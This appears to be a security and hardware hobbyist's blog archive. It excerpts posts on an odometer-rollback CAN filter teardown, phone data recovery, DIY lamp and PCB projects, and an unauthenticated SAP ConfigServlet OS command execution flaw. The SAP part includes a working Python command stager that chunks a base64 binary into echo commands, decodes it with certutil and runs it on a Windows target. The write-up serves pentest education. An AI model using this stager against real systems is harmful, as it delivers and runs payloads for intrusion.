I read an article on Hackaday about the teardown of a dashboard mileage manipulator dongle. A “CAN bus filter” device was found in a vehicle, connected to the back of its instrument cluster. When it was removed and the original connections were restored, the odometer immediately showed 40 000 kilometers more than before. The author made a quick teardown and analysis of the device, but because it was supposedly locked (according to the article), the firmware was not extracted, leaving the big question unanswered: what does it do and how does it do it?
Mileage manipulation is illegal in many countries and one can easily go to jail for doing it. Still, it is quite common practice on the used car market, and mileage manipulator devices can easily be purchased by anyone. The main purpose of these “greyish” tools is to mislead and fool buyers. Considering this, I was happy to extend my “to be hacked” list with them, and I also wanted to see how they work and whether there is anything to do against the “attack”. Everything was set for a cool project combining car hacking, hardware hacking and reverse engineering. Due to the nature of the topic, I expect readers with less relevant technical knowledge as well, so I tried to provide a bit more detail and explanation to make sure everyone can follow along.
These boards can be found on eBay for $15-25, e.g. by searching for “18 in 1 Universal CAN Filter“. Several sellers offer them under different fantasy names and with some variance in their supported vehicle list. I decided to order two types of CAN filter from two different sellers. They had the same functionality, but their PCBs looked a bit different. Both CAN filter devices support a bunch of car models from two major German OEMs (just look at the description on the eBay product pages). Once the mileage has been rolled back, the device prevents the odometer from re-syncing and increasing by manipulating the relevant CAN communication. For easier reference, I will call them the #blue CAN filter and the #green CAN filter in the following sections.
“Hacktivity is the biggest event of its kind in Central & Eastern Europe. About 1000 visitors are coming from all around the globe every year to learn more about the latest trends of cybersecurity, get inspired by people with similar interest and develop themselves via comprehensive workshops and training sessions”.
For many years this hacker conference has been a fixed point in the year for me, as a visitor or sometimes as a presenter. This year was special, because instead of giving a talk I decided to go there with a training.
Hardware hacking is a topic that, for some reason, is not addressed much by professionals in our region. As this is both a hobby and a profession for me, I was happy to provide the Reverse Engineering & Hacking Hardware training to people who wanted to step into this area.
Recently I received a request to check the data recovery possibilities for a damaged Sony Xperia Z5 Premium smartphone. The phone was dropped and it stopped working. No screen, no charging, no communication on any interface, no sign of life; it was nothing more than a brick. Well, a brick with tons of useful data on it, without any cloud synchronisation or offline backup. Needless to say how important it was for the owner to get his priceless information back from the device.
Some damage identification and recovery attempts had already been made by other professional parties; even a new screen was ordered and tried, but none of these activities gave any promising result. After the failed attempts the owner had almost given up hope, but fortunately we had a common acquaintance, and this is how I came into the picture. Due to the previous investigations the phone arrived partially dismantled, without a battery and with some metal shields already removed.
When we moved to our new home we tried to find modern LED lamps for the ceiling lights but it was not an easy task. The requirements were simple:
Light source should be LED strip/bulb/module
Sufficient overall brightness for lighting a room
The LED lamps available on the market were good for decorative illumination only; almost none of them reached the brightness of a traditional 100 W incandescent bulb (1600 lumen). We found some powerful ones, but their light was directed in one direction and not diffused, so they would be great e.g. for lighting a dining table but not for illuminating a whole room.
It took a couple of months, plenty of visits to different shops and a lot of time wasted browsing web stores before we realized that no lamp would match our needs and we had to find another solution. So we changed the approach and looked for standard ceiling lamps that could be customized and upgraded.
During our trip to Krakow we found a nice one (Nowodvorski Tokyo) in the local OBI market, made by Nowodvorski, a Polish company. This lamp is designed for two T8/G13 fluorescent tubes. The package contained the lamp only, without the tubes. We loved the wood frame, the sandblasted glass and the overall design, and it seemed to be a good candidate for further modification, so we made our decision and bought it.
Later, at home, I started the upgrade process by dismantling it:
In the past years I have always had some DIY electronics projects that I tried to build at home. For prototyping, breadboards are fine, but as soon as you take the next step towards stable, final hardware you should work with PCBs. I do not count the pre-made prototype PCBs with their fixed pattern of pads and traces across the board: they are not good for SMD parts, and the overall look with them will most probably be simply unprofessional.
So, if you would like to work with your own nicely designed PCBs, you can choose from several PCB manufacturers who support hobbyists with low-cost, low-quantity production. However, for early prototyping there are some issues with them:
You have to wait 1-2 weeks or even more before you get your boards, or pay much more for fast production/delivery.
HW development is much like SW development: in a complex project there is a good chance of having issues with your first (and second, and third…) board, so you pay for every variant and wait even longer for production/delivery.
If you make PCBs often, it is definitely worth creating your own “PCB fab” at home so that you can prototype your boards quickly. Then, if it is still necessary, you can order the final version from a professional manufacturer.
I am not a big fan of toner transfer and the other alternative methods, and since I made photoresist PCBs at school, I decided to build a UV exposure “tool” for this purpose.
Plenty of DIY PCB UV exposure tool build posts are available on the internet, with totally different approaches. I also designed my own to fulfil my needs: it should be relatively small and portable, and the hacking/modding should be fun. 🙂 Flatbed scanners looked like a good target. Compared to most other scanner mods, which use LED arrays or fluorescent tubes across the whole scanner bed, my plan was to use the scanner carriage with only a few LEDs and control its movement (and brightness) under the given PCB.
After a quick search on the local second-hand portal I found a nice old Mustek 1200CP for about 4 EUR. I made the investment 🙂 and started the work.
Still SAP, still the same OS command execution vulnerability I mentioned in my previous post. So what is the difference? Well, it is good to be able to run OS commands on the target system, but you probably want something more. Yes, I am talking about binary payloads.
Since OS commands can be executed through the ConfigServlet, it is relatively easy to deliver binary payloads and execute them with Metasploit’s command stagers. These stagers convert the binary payload into an ASCII-deliverable format and use OS commands to write out the payload and the stager line by line, and finally execute the payload through the dropped stager. Because VBS is more common in Windows environments than PowerShell, I chose CmdStagerVBS.
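The following is an added example of the staging mechanics described above. It is neither the module from this post nor Metasploit code: it encodes a binary as base64, splits it into chunks that fit one command line (and one URL, since the commands travel in GET requests), appends each chunk to a drop file with `echo`, and finishes with a decode-and-run command. The file names, chunk size and the use of `certutil -decode` as the decoder (standing in for the VBS decoder that CmdStagerVBS drops) are assumptions for illustration. The in-memory “target” used to check the round trip is constructed here and is not a real host.

```python
"""Minimal command stager, in the spirit of Metasploit's CmdStager classes.

Added example for this post; it is neither the module discussed above nor
Metasploit code.  File names, chunk size and the decode/run commands are
assumptions for illustration; `certutil -decode` stands in for the VBS
decoder that CmdStagerVBS drops.
"""
import base64
from typing import List
from urllib.parse import quote

DROP_FILE = r"%TEMP%\stage.b64"   # assumption: where the text chunks land
OUT_FILE = r"%TEMP%\stage.exe"    # assumption: the reassembled binary

# cmd.exe metacharacters that would need caret-escaping inside an echo argument
CMD_META = set('&|<>^()%!"')


def encode_payload(payload: bytes) -> str:
    """Base64 output is [A-Za-z0-9+/=] only, so nothing needs escaping for cmd.exe."""
    text = base64.b64encode(payload).decode("ascii")
    if set(text) & CMD_META:
        raise ValueError("encoder produced cmd.exe metacharacters")
    return text


def build_stager(payload: bytes, chunk_size: int = 100,
                 max_cmd_len: int = 2000) -> List[str]:
    """Return the ordered OS commands that drop and run the payload.

    The redirection is put *before* `echo` on purpose: with `echo ABC1>>file`
    cmd.exe reads the trailing digit as a file handle (stdout) and drops it
    from the output, which would silently corrupt any chunk ending in 0-9.
    max_cmd_len mirrors the practical size limit of a URL-delivered command
    and is checked against the URL-encoded form of every command.
    """
    b64 = encode_payload(payload)
    cmds = [f">>{DROP_FILE} echo {b64[i:i + chunk_size]}"
            for i in range(0, len(b64), chunk_size)]
    cmds.append(f"certutil -decode {DROP_FILE} {OUT_FILE}")
    cmds.append(f"start /b {OUT_FILE}")
    cmds.append(f"del {DROP_FILE}")
    if any(len(quote(c, safe="")) > max_cmd_len for c in cmds):
        raise ValueError("chunk_size too large for the delivery channel")
    return cmds


def simulate_target(cmds: List[str]) -> bytes:
    """Replay the commands against a constructed in-memory stand-in for the
    target's filesystem and decode the drop file the way certutil would,
    ignoring line breaks.  Returns the reassembled binary."""
    files: dict = {}
    for cmd in cmds:
        if cmd.startswith(">>"):
            target, _, text = cmd[2:].partition(" echo ")
            files[target] = files.get(target, "") + text + "\r\n"  # echo adds CRLF
        elif cmd.startswith("certutil -decode "):
            _, src, dst = cmd.rsplit(" ", 2)
            files[dst] = base64.b64decode("".join(files[src].split()))
    return files[OUT_FILE]


if __name__ == "__main__":
    sample = b"MZ" + bytes(range(256)) * 4   # constructed stand-in for a PE payload
    staged = build_stager(sample, chunk_size=76)
    print("\n".join(staged))
    print("round trip ok:", simulate_target(staged) == sample)
```

The chunk size is the knob that trades request count against per-request length: a smaller chunk means more GET requests but a safer URL length. The same `>>file echo …` layout is what makes the approach work for the stager script itself when it is dropped line by line, as CmdStagerVBS does with its VBS decoder.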
If you have ever searched for SAP vulnerabilities, I am sure you have met some form of the ERPScan team’s awesome research. This happened in our current pentest project as well. A colleague of mine identified several SAP systems in the target network range and we tried to find well-known vulnerabilities for them.
We found a great presentation (Breaking SAP Portal) from Hacker Halted 2012 by Dmitry Chastuchin of ERPScan. One of the slides contains a very interesting screenshot of the exploitation of a simple, remote, unauthenticated OS command execution vulnerability. Yes, with a simple GET request it is possible to execute OS commands on the remote system. I searched for existing exploit implementations for this vulnerability, but there were no public Metasploit or other exploits available. Surprisingly, not only were there no exploits, there were no relevant search results for this vulnerability at all, so I decided to create a Metasploit module for it.